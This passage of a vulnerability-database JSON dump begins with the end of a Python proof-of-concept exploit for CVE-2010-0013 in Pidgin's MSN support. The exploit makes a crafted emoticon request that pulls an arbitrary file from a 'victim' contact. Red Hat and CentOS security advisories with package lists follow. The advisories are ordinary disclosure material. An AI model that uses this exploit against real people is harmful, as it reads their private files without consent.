((current_blob.current_size*100)/current_blob.total_size)),\r\n\t\t\t\tsys.stdout.flush()\r\n\r\n\r\ndef error_handler(self, error_type, error):\r\n\t# __on_user_invitation_failed, probably because contact is offline/invisible\r\n\tif error_type == pymsn.event.ConversationErrorType.CONTACT_INVITE and \\\r\n\terror == pymsn.event.ContactInviteError.NOT_AVAILABLE:\r\n\t\tprint &#34;[*] ERROR, contact didn&#39;t accept our invite, probably because it is disconnected/invisible&#34;\r\n\t\tquit()\r\n\t# __on_message_undelivered, probably because contact is offline/invisible\r\n\tif error_type == pymsn.event.ConversationErrorType.MESSAGE and \\\r\n\terror == pymsn.event.MessageError.DELIVERY_FAILED:\r\n\t\tprint &#34;[*] ERROR, couldn&#39;t send message, probably because contact is disconnected/invisible&#34;\r\n\t\tquit()\r\n\tprint &#34;[*] Unhandled error, error_type : %d , error : %d&#34;%(error_type, error)\r\n\tquit()\r\n\t\r\nclass MyClient(pymsn.Client):\r\n\tdef __init__(self, server, quit, victim, filename, list_only, proxies={}, transport_class=pymsn.transport.DirectConnection):\r\n\t\t# callback to quit\r\n\t\tself.quit = quit\r\n\t\t# victim from whom we request the file\r\n\t\tself.victim = victim\r\n\t\t# just list contacts for this account\r\n\t\tself.list_only = list_only\r\n\t\t# file we request\r\n\t\tself.filename = filename\r\n\t\t# to calculate download duration and speed\r\n\t\tself.begin = 0\r\n\t\tself.end = 0\r\n\t\t# session_id of the connection to retrieve the file\r\n\t\tself.session_id = 0\r\n\t\t# have we already seen the &#34;control blob&#34; for this connection\r\n\t\tself.GOT_CONTROL_BLOB = False\r\n\t\tpymsn.Client.__init__(self, server)\r\n\t\t# REALLY REALLY HACKISH\r\n\t\t# if contact is disconnected/invisible, a &#34;NotImplementedError&#34; exception is raised\r\n\t\t# and it can&#39;t be caught AFAIK so it needs to be redefined here\r\n\t\t# handler_class should be SwitchboardClient\r\n\t\tfor handler_class, extra_args in self._switchboard_manager._handlers_class:\r\n\t\t\thandler_class._on_error = error_handler\r\n\r\n\r\n\r\nclass MyMSNObjectStore(pymsn.p2p.MSNObjectStore):\r\n\tdef __compute_data_hash(self, data):\r\n\t\tdigest = hashlib.sha1()\r\n\t\tdata.seek(0, 0)\r\n\t\tread_data = data.read(1024)\r\n\t\twhile len(read_data) &#62; 0:\r\n\t\t\tdigest.update(read_data)\r\n\t\t\tread_data = data.read(1024)\r\n\t\tdata.seek(0, 0)\r\n\t\treturn digest.digest()\r\n\r\n\t# need to compute the SHA hash (SHAd in MSNObject) otherelse the function in MSNObjectStore complains because\r\n\t# the hash of the data we receive is not the hash we expected (hash we expect is the one we send, which is always the same here)\r\n\tdef _outgoing_session_transfer_completed(self, session, data):\r\n\t\thandle_id, callback, errback, msn_object = self._outgoing_sessions[session] \r\n\t\tmsn_object._data_sha = self.__compute_data_hash(data) \t \r\n\t\tsuper(MyMSNObjectStore, self)._outgoing_session_transfer_completed(session, data)\r\n\r\nclass ClientEventHandler(pymsn.event.ClientEventInterface):\r\n\t\t\t\r\n\tdef on_client_error(self, error_type, error):\r\n\t\tif error_type == pymsn.event.ClientErrorType.AUTHENTICATION:\r\n\t\t\t print &#34;[+] Authentication failed, bad login/password&#34;\r\n\t\t\t self._client.quit()\r\n\t\telse:\r\n\t\t\t print &#34;[*] ERROR :&#34;, error_type, &#34; -&#62;&#34;, error\r\n\t\t\t \r\n\tdef on_client_state_changed(self, state):\r\n\t\t#print &#34;State changed to %s&#34; % state\r\n\t\tif state == pymsn.client.ClientState.CLOSED:\r\n\t\t\tprint &#34;[+] Connection to server closed&#34;\r\n\t\t\tself._client.quit()\r\n \r\n\t\tif state == pymsn.client.ClientState.CONNECTING:\r\n\t\t\tif self.current_state != state:\r\n\t\t\t\tprint &#34;[+] Connecting to server&#34;\r\n\t\t\tself.current_state = state\r\n\t\tif state == pymsn.client.ClientState.AUTHENTICATING:\r\n\t\t\tif self.current_state != state:\r\n\t\t\t\tprint &#34;[+] Authentication in progress&#34;\r\n\t\t\tself.current_state = state\r\n\t\tif state == pymsn.client.ClientState.SYNCHRONIZING:\r\n\t\t\tif self.current_state != state:\r\n\t\t\t\tprint &#34;[+] Synchronisation in progress&#34;\r\n\t\t\tself.current_state = state\r\n\r\n\t\tif state == pymsn.client.ClientState.OPEN:\r\n\t\t\tprint &#34;[+] OK, all done, ready to proceed&#34;\r\n\t\t\tself._client.profile.presence = pymsn.Presence.INVISIBLE\r\n\t\t\tcontact_dict = {}\r\n\t\t\tfor i in self._client.address_book.contacts:\r\n\t\t\t\tcontact_dict[i.account] = i\r\n\t\t\tif self._client.list_only:\r\n\t\t\t\tfor (k,v) in contact_dict.items():\r\n\t\t\t\t\tprint k+&#34; (&#34;+v.display_name+&#34;)&#34;\r\n\t\t\t\tself._client.quit()\r\n\t\t\telse:\r\n\t\t\t\tif self._client.victim not in contact_dict.keys():\r\n\t\t\t\t\tprint &#34;[*] Error, contact %s not in your contact list&#34;%self._client.victim\r\n\t\t\t\t\tself._client.quit()\r\n\t\t\t\telse: \r\n\t\t\t\t\tcontact = contact_dict[self._client.victim]\r\n\t\t\t\t\tstore = MyMSNObjectStore(self._client)\r\n\t\t\t\t\tobject = pymsn.p2p.MSNObject(contact, 65535, pymsn.p2p.MSNObjectType.CUSTOM_EMOTICON, self._client.filename, &#39;AAA=&#39;,&#39;2jmj7l5rSw0yVb/vlWAYkK/YBwk=&#39;)\r\n\t\t\t\t\tprint &#34;[+] Sending request for file \\&#34;%s\\&#34; to \\&#34;%s\\&#34;&#34;%(self._client.filename, self._client.victim)\r\n\t\t\t\t\tself._client.begin = time.time()\r\n\t\t\t\t\tstore.request(object, [handle_answer, self._client])\r\n\t\t\t\t\t# at this moment, we got only one session_id, the one we will use to request the file\r\n\t\t\t\t\tfor k in store._outgoing_sessions.keys():\r\n\t\t\t\t\t\tprint &#34;[+] Using session_id %d&#34;%k._id\r\n\t\t\t\t\t\tself._client.session_id = k._id\r\n\t\t\t\t\t# hack to set up my own callback each time we receive a chunk, used to print the percentage of the download\r\n\t\t\t\t\tself._client._p2p_session_manager._transport_manager._on_chunk_received_OLD = self._client._p2p_session_manager._transport_manager._on_chunk_received\r\n\t\t\t\t\tself._client._p2p_session_manager._transport_manager._on_chunk_received = my_on_chunk_recv\r\n\t\t\t\t\t# if no file transfer received from the victim after TIMEOUT seconds, quit\r\n\t\t\t\t\tgobject.timeout_add(TIMEOUT*1000, check_if_succeeds)\r\n\r\n\tdef __init__(self, client):\r\n\t\tself.current_state = None\r\n\t\tpymsn.event.ClientEventInterface.__init__(self, client)\r\n\r\n\r\nif __name__ == &#39;__main__&#39;:\r\n\tprint &#34;***********************************************************\\n&#34;\r\n\tprint &#34;Pidgin MSN file download vulnerability (CVE-2010-0013)\\n&#34;\r\n\tprint &#34;Usage: %prog -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE_REQUESTED [-o DESTINATION_FILE] [-l]\\n&#34;\r\n\tprint &#34;***********************************************************\\n&#34;\r\n\r\n\tusage = &#34;Usage: %prog -a YOUR_MSN_EMAIL -c TARGET_MSN_EMAIL -f FILE_REQUESTED [-o DESTINATION_FILE] [-l] &#34;\r\n\tparser = OptionParser(usage=usage)\r\n\tparser.add_option(&#34;-f&#34;, &#34;--file&#34;, dest=&#34;filename&#34;, default=None,\r\n\t\t\t\t\t help=&#34;File requested to remote contact&#34;)\r\n\tparser.add_option(&#34;-o&#34;, &#34;--output&#34;, dest=&#34;output_file&#34;, default=None,\r\n\t\t\t\t\t help=&#34;Where to write received file, STDOUT otherelse&#34;)\r\n\tparser.add_option(&#34;-a&#34;, &#34;--account&#34;, dest=&#34;account&#34;, default=None,\r\n\t\t\t\t\t help=&#34;MSN account to use&#34;)\r\n\tparser.add_option(&#34;-c&#34;, &#34;--contact&#34;, dest=&#34;contact&#34;, default=None,\r\n\t\t\t\t\t help=&#34;Contact to request file from&#34;)\r\n\tparser.add_option(&#34;-l&#34;, &#34;--list&#34;, dest=&#34;list_only&#34;, action=&#34;store_true&#34;, default=False,\r\n\t\t\t\t\t help=&#34;Just print contact list for your account and exit&#34;)\r\n\t\r\n\t(options, args) = parser.parse_args()\r\n\tif not options.filename or not options.account or not options.contact:\r\n\t\tif not (options.account and options.list_only):\r\n\t\t\tprint &#34;Error, parameter missing&#34;\r\n\t\t\tparser.print_help()\r\n\t\t\tsys.exit(-1)\r\n\r\n\tif options.output_file != None:\r\n\t\ttry:\r\n\t\t\tFD_OUT = open(options.output_file,&#34;wb&#34;)\r\n\t\texcept Exception,e:\r\n\t\t\tprint &#34;Cannot open file %s (%s)&#34;%(options.output_file, e)\r\n\t\t\tsys.exit(-1)\r\n\r\n\tMAINLOOP = gobject.MainLoop()\r\n\r\n\tdef sigterm_cb():\r\n\t\tgobject.idle_add(quit)\r\n\r\n\tsignal.signal(signal.SIGTERM, sigterm_cb)\r\n\r\n\tlogging.basicConfig(level=logging.CRITICAL) # allows us to see the protocol debug\r\n\tserver = (SERVER_ADDRESS, SERVER_PORT)\r\n\tclient = MyClient(server, quit, options.contact, options.filename, options.list_only)\r\n\tglobal_client = client\r\n\tclient_events_handler = ClientEventHandler(client)\r\n\tprint &#34;Please enter the password for the account \\&#34;%s\\&#34;&#34;%options.account\r\n\ttry:\r\n\t\tpasswd = getpass.getpass()\r\n\texcept KeyboardInterrupt:\r\n\t\tquit()\r\n\r\n\tlogin_info = (options.account, passwd)\r\n\tclient.login(*login_info)\r\n\ttry:\r\n\t\tMAINLOOP.run()\r\n\texcept KeyboardInterrupt:\r\n\t\tquit()\r\n\n ", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-67539", "status": "cve,poc"}], "redhat": [{"lastseen": "2018-12-11T17:45:10", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "arch": "i386", "packageName": "libpurple-tcl", "packageFilename": "libpurple-tcl-2.6.6-1.el4.i386.rpm", "operator": "lt"}], "description": "Pidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nAn input sanitization flaw was found in the way Pidgin's MSN protocol\nimplementation handled MSNSLP invitations. A remote attacker could send a\nspecially-crafted INVITE request that would cause a denial of service\n(memory corruption and Pidgin crash). (CVE-2010-0277)\n\nA denial of service flaw was found in Finch's XMPP chat implementation,\nwhen using multi-user chat. If a Finch user in a multi-user chat session\nwere to change their nickname to contain the HTML \"br\" element, it would\ncause Finch to crash. (CVE-2010-0420)\n\nRed Hat would like to thank Sadrul Habib Chowdhury of the Pidgin project\nfor responsibly reporting the CVE-2010-0420 issue.\n\nA denial of service flaw was found in the way Pidgin processed emoticon\nimages. A remote attacker could flood the victim with emoticon images\nduring mutual communication, leading to excessive CPU use. (CVE-2010-0423)\n\nThese packages upgrade Pidgin to version 2.6.6. Refer to the Pidgin release\nnotes for a full list of changes: http://developer.pidgin.im/wiki/ChangeLog\n\nAll Pidgin users are advised to upgrade to these updated packages, which\ncorrect these issues. Pidgin must be restarted for this update to take\neffect.", "reporter": "RedHat", "published": "2010-02-18T05:00:00", "type": "redhat", "title": "(RHSA-2010:0115) Moderate: pidgin security update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-0277", "CVE-2010-0420", "CVE-2010-0423"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T11:48:27", "id": "RHSA-2010:0115", "href": "https://access.redhat.com/errata/RHSA-2010:0115", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-12-11T17:43:44", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageName": "pidgin-perl", "packageFilename": "pidgin-perl-2.6.5-1.el4.1.i386.rpm", "operator": "lt"}], "description": "Pidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nA directory traversal flaw was discovered in Pidgin's MSN protocol\nimplementation. A remote attacker could send a specially-crafted emoticon\nimage download request that would cause Pidgin to disclose an arbitrary\nfile readable to the user running Pidgin. (CVE-2010-0013)\n\nThese packages upgrade Pidgin to version 2.6.5. Refer to the Pidgin release\nnotes for a full list of changes: http://developer.pidgin.im/wiki/ChangeLog\n\nAll Pidgin users should upgrade to these updated packages, which correct\nthis issue. Pidgin must be restarted for this update to take effect.", "reporter": "RedHat", "published": "2010-01-14T05:00:00", "type": "redhat", "title": "(RHSA-2010:0044) Important: pidgin security update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-0013"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T12:20:32", "id": "RHSA-2010:0044", "href": "https://access.redhat.com/errata/RHSA-2010:0044", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}}, {"lastseen": "2018-12-11T17:41:55", "_object_types": ["robots.models.redhat.RedHatBulletin", "robots.models.base.Bulletin"], "references": [], "affectedPackage": [{"OS": "RedHat", "OSVersion": "4", "packageVersion": "2.6.6-5.el4_8", "arch": "i386", "packageName": "finch", "packageFilename": "finch-2.6.6-5.el4_8.i386.rpm", "operator": "lt"}], "description": "Pidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nMultiple NULL pointer dereference flaws were found in the way Pidgin\nhandled Base64 decoding. A remote attacker could use these flaws to crash\nPidgin if the target Pidgin user was using the Yahoo! Messenger Protocol,\nMSN, MySpace, or Extensible Messaging and Presence Protocol (XMPP) protocol\nplug-ins, or using the Microsoft NT LAN Manager (NTLM) protocol for\nauthentication. (CVE-2010-3711)\n\nA NULL pointer dereference flaw was found in the way the Pidgin MSN\nprotocol plug-in processed custom emoticon messages. A remote attacker\ncould use this flaw to crash Pidgin by sending specially-crafted emoticon\nmessages during mutual communication. (CVE-2010-1624)\n\nRed Hat would like to thank the Pidgin project for reporting these issues.\nUpstream acknowledges Daniel Atallah as the original reporter of\nCVE-2010-3711, and Pierre Nogues of Meta Security as the original reporter\nof CVE-2010-1624.\n\nAll Pidgin users should upgrade to these updated packages, which contain\nbackported patches to resolve these issues. Pidgin must be restarted for\nthis update to take effect.\n", "reporter": "RedHat", "published": "2010-10-21T04:00:00", "type": "redhat", "title": "(RHSA-2010:0788) Moderate: pidgin security update", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "unix", "cvelist": ["CVE-2010-1624", "CVE-2010-3711"], "_object_type": "robots.models.redhat.RedHatBulletin", "modified": "2017-09-08T12:10:29", "id": "RHSA-2010:0788", "href": "https://access.redhat.com/errata/RHSA-2010:0788", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}], "centos": [{"lastseen": "2017-10-03T18:24:33", "references": ["http://rhn.redhat.com/errata/RHSA-2010-0115.html", "http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xBEFA581B", "https://rhn.redhat.com/errata/RHSA-2010-0115.html"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "libpurple-devel-2.6.6-1.el5.i386.rpm", "packageName": "libpurple-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "libpurple-devel-2.6.6-1.el5.i386.rpm", "packageName": "libpurple-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "libpurple-tcl-2.6.6-1.el5.x86_64.rpm", "packageName": "libpurple-tcl", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "libpurple-tcl-2.6.6-1.el4.i386.rpm", "packageName": "libpurple-tcl", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "pidgin-2.6.6-1.el5.x86_64.rpm", "packageName": "pidgin", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "pidgin-devel-2.6.6-1.el4.x86_64.rpm", "packageName": "pidgin-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "pidgin-perl-2.6.6-1.el5.x86_64.rpm", "packageName": "pidgin-perl", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "finch-2.6.6-1.el5.i386.rpm", "packageName": "finch", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "finch-2.6.6-1.el5.i386.rpm", "packageName": "finch", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "libpurple-2.6.6-1.el4.x86_64.rpm", "packageName": "libpurple", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "libpurple-2.6.6-1.el5.x86_64.rpm", "packageName": "libpurple", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "finch-2.6.6-1.el5.x86_64.rpm", "packageName": "finch", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "finch-devel-2.6.6-1.el4.x86_64.rpm", "packageName": "finch-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "libpurple-tcl-2.6.6-1.el4.x86_64.rpm", "packageName": "libpurple-tcl", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "libpurple-2.6.6-1.el5.i386.rpm", "packageName": "libpurple", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "libpurple-2.6.6-1.el5.i386.rpm", "packageName": "libpurple", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "libpurple-devel-2.6.6-1.el4.x86_64.rpm", "packageName": "libpurple-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "finch-devel-2.6.6-1.el4.i386.rpm", "packageName": "finch-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "pidgin-perl-2.6.6-1.el4.i386.rpm", "packageName": "pidgin-perl", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "libpurple-2.6.6-1.el4.i386.rpm", "packageName": "libpurple", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "finch-2.6.6-1.el4.i386.rpm", "packageName": "finch", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "pidgin-perl-2.6.6-1.el5.i386.rpm", "packageName": "pidgin-perl", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "libpurple-perl-2.6.6-1.el4.i386.rpm", "packageName": "libpurple-perl", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "pidgin-devel-2.6.6-1.el5.i386.rpm", "packageName": "pidgin-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "pidgin-devel-2.6.6-1.el5.i386.rpm", "packageName": "pidgin-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "pidgin-devel-2.6.6-1.el4.i386.rpm", "packageName": "pidgin-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "pidgin-2.6.6-1.el4.src.rpm", "packageName": "pidgin", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "pidgin-2.6.6-1.el4.src.rpm", "packageName": "pidgin", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "libpurple-perl-2.6.6-1.el5.x86_64.rpm", "packageName": "libpurple-perl", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "libpurple-tcl-2.6.6-1.el5.i386.rpm", "packageName": "libpurple-tcl", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "finch-devel-2.6.6-1.el5.x86_64.rpm", "packageName": "finch-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "pidgin-perl-2.6.6-1.el4.x86_64.rpm", "packageName": "pidgin-perl", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "finch-devel-2.6.6-1.el5.i386.rpm", "packageName": "finch-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "finch-devel-2.6.6-1.el5.i386.rpm", "packageName": "finch-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "pidgin-devel-2.6.6-1.el5.x86_64.rpm", "packageName": "pidgin-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "libpurple-perl-2.6.6-1.el4.x86_64.rpm", "packageName": "libpurple-perl", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "libpurple-devel-2.6.6-1.el4.i386.rpm", "packageName": "libpurple-devel", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "pidgin-2.6.6-1.el5.i386.rpm", "packageName": "pidgin", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "pidgin-2.6.6-1.el5.i386.rpm", "packageName": "pidgin", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "pidgin-2.6.6-1.el4.i386.rpm", "packageName": "pidgin", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "pidgin-2.6.6-1.el4.x86_64.rpm", "packageName": "pidgin", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "libpurple-perl-2.6.6-1.el5.i386.rpm", "packageName": "libpurple-perl", "arch": "i386", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "libpurple-devel-2.6.6-1.el5.x86_64.rpm", "packageName": "libpurple-devel", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.6-1.el4", "packageFilename": "finch-2.6.6-1.el4.x86_64.rpm", "packageName": "finch", "arch": "x86_64", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "pidgin-2.6.6-1.el5.src.rpm", "packageName": "pidgin", "arch": "any", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.6-1.el5", "packageFilename": "pidgin-2.6.6-1.el5.src.rpm", "packageName": "pidgin", "arch": "any", "operator": "lt"}], "description": "**CentOS Errata and Security Advisory** CESA-2010:0115\n\n\nPidgin is an instant messaging program which can log in to multiple\naccounts on multiple instant messaging networks simultaneously.\n\nAn input sanitization flaw was found in the way Pidgin's MSN protocol\nimplementation handled MSNSLP invitations. A remote attacker could send a\nspecially-crafted INVITE request that would cause a denial of service\n(memory corruption and Pidgin crash). (CVE-2010-0277)\n\nA denial of service flaw was found in Finch's XMPP chat implementation,\nwhen using multi-user chat. If a Finch user in a multi-user chat session\nwere to change their nickname to contain the HTML \"br\" element, it would\ncause Finch to crash. (CVE-2010-0420)\n\nRed Hat would like to thank Sadrul Habib Chowdhury of the Pidgin project\nfor responsibly reporting the CVE-2010-0420 issue.\n\nA denial of service flaw was found in the way Pidgin processed emoticon\nimages. A remote attacker could flood the victim with emoticon images\nduring mutual communication, leading to excessive CPU use. (CVE-2010-0423)\n\nThese packages upgrade Pidgin to version 2.6.6. Refer to the Pidgin release\nnotes for a full list of changes: http://developer.pidgin.im/wiki/ChangeLog\n\nAll Pidgin users are advised to upgrade to these updated packages, which\ncorrect these issues. Pidgin must be restarted for this update to take\neffect.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2010-February/016511.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-February/016512.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-February/016523.html\nhttp://lists.centos.org/pipermail/centos-announce/2010-February/016524.html\n\n**Affected packages:**\nfinch\nfinch-devel\nlibpurple\nlibpurple-devel\nlibpurple-perl\nlibpurple-tcl\npidgin\npidgin-devel\npidgin-perl\n\n**Upstream details at:**\n\nhttps://rhn.redhat.com/errata/RHSA-2010-0115.html", "edition": 1, "reporter": "CentOS Project", "published": "2010-02-20T00:04:47", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "title": "finch, libpurple, pidgin security update", "type": "centos", "bulletinFamily": "unix", "cvelist": ["CVE-2010-0420", "CVE-2010-0423", "CVE-2010-0277"], "modified": "2010-02-23T00:11:45", "href": "http://lists.centos.org/pipermail/centos-announce/2010-February/016511.html", "id": "CESA-2010:0115", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-10-03T18:24:57", "references": ["https://rhn.redhat.com/errata/RHSA-2010-0044.html", "http://pgp.mit.edu:11371/pks/lookup?op=get&search=0xBEFA581B"], "affectedPackage": [{"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageName": "pidgin-devel", "packageFilename": "pidgin-devel-2.6.5-1.el4.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageName": "finch-devel", "packageFilename": "finch-devel-2.6.5-1.el4.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageName": "pidgin-devel", "packageFilename": "pidgin-devel-2.6.5-1.el4.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageName": "libpurple-devel", "packageFilename": "libpurple-devel-2.6.5-1.el4.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "x86_64", "packageName": "libpurple-tcl", "packageFilename": "libpurple-tcl-2.6.5-1.el5.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "i386", "packageName": "pidgin-devel", "packageFilename": "pidgin-devel-2.6.5-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "i386", "packageName": "pidgin-devel", "packageFilename": "pidgin-devel-2.6.5-1.el5.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "x86_64", "packageName": "finch", "packageFilename": "finch-2.6.5-1.el4.1.x86_64.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageName": "libpurple", "packageFilename": "libpurple-2.6.5-1.el4.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "4", "packageVersion": "2.6.5-1.el4.1", "arch": "i386", "packageName": "pidgin", "packageFilename": "pidgin-2.6.5-1.el4.1.i386.rpm", "operator": "lt"}, {"OS": "CentOS", "OSVersion": "5", "packageVersion": "2.6.5-1.el5", "arch": "x86_64", "packageName": "libpurple", "packageFilename": 